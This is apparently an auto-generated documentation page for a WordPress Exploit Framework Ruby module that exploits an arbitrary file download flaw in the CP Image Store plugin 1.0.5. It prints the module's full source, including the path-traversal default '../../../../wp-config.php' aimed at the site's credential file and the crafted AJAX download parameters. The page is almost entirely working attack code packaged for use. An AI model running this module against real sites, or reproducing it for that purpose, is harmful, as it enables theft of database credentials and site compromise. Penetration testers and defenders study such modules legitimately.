class Wpxf::Auxiliary::CpImageStoreArbitraryFileDownload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::FileDownload::new
# File lib/wpxf/modules/auxiliary/file_download/cp_image_store_arbitrary_file_download.rb, line 6
def initialize
  super

  update_info(
    name: 'CP Image Store Arbitrary File Download',
    desc: %(
      This module exploits a vulnerability in version 1.0.5 of the CP
      Image Store plugin which allows you to download any arbitrary
      file accessible by the user the web server is running as.
    ),
    author: [
      'Joaquin Ramirez Martinez', # Disclosure
      'rastating'                 # WPXF module
    ],
    references: [
      ['EDB', '37559']
    ],
    date: 'Jun 10 2015'
  )

  register_option(
    IntegerOption.new(
      name: 'purchase_id',
      desc: 'A valid purchase ID',
      required: true,
      default: 1
    )
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/cp_image_store_arbitrary_file_download.rb, line 36
def check
  check_plugin_version_from_readme('cp-image-store', '1.0.6', '1.0.5')
end
default_remote_file_path() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/cp_image_store_arbitrary_file_download.rb, line 40
def default_remote_file_path
  '../../../../wp-config.php'
end
download_request_params() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/cp_image_store_arbitrary_file_download.rb, line 52
def download_request_params
  {
    'action' => 'cpis_init',
    'cpis-action' => 'f-download',
    'purchase_id' => purchase_id.to_s,
    'cpis_user_email' => Utility::Text.rand_email,
    'f' => remote_file
  }
end
downloader_url() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/cp_image_store_arbitrary_file_download.rb, line 62
def downloader_url
  full_uri
end
handle_unexpected_http_code(code) click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/cp_image_store_arbitrary_file_download.rb, line 66
def handle_unexpected_http_code(code)
  if code == 302
    emit_error 'The purchase ID appears to be invalid or reached the maximum number of downloads'
    return false
  end

  super
end
purchase_id() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/cp_image_store_arbitrary_file_download.rb, line 48
def purchase_id
  normalized_option_value('purchase_id')
end
run() click to toggle source
Calls superclass method Wpxf::WordPress::FileDownload#run
# File lib/wpxf/modules/auxiliary/file_download/cp_image_store_arbitrary_file_download.rb, line 75
def run
  res = nil
  scoped_option_change('follow_http_redirection', false) do
    res = super
  end
  res
end
working_directory() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/cp_image_store_arbitrary_file_download.rb, line 44
def working_directory
  'wp-content/plugins/cp-image-store/downloads'
end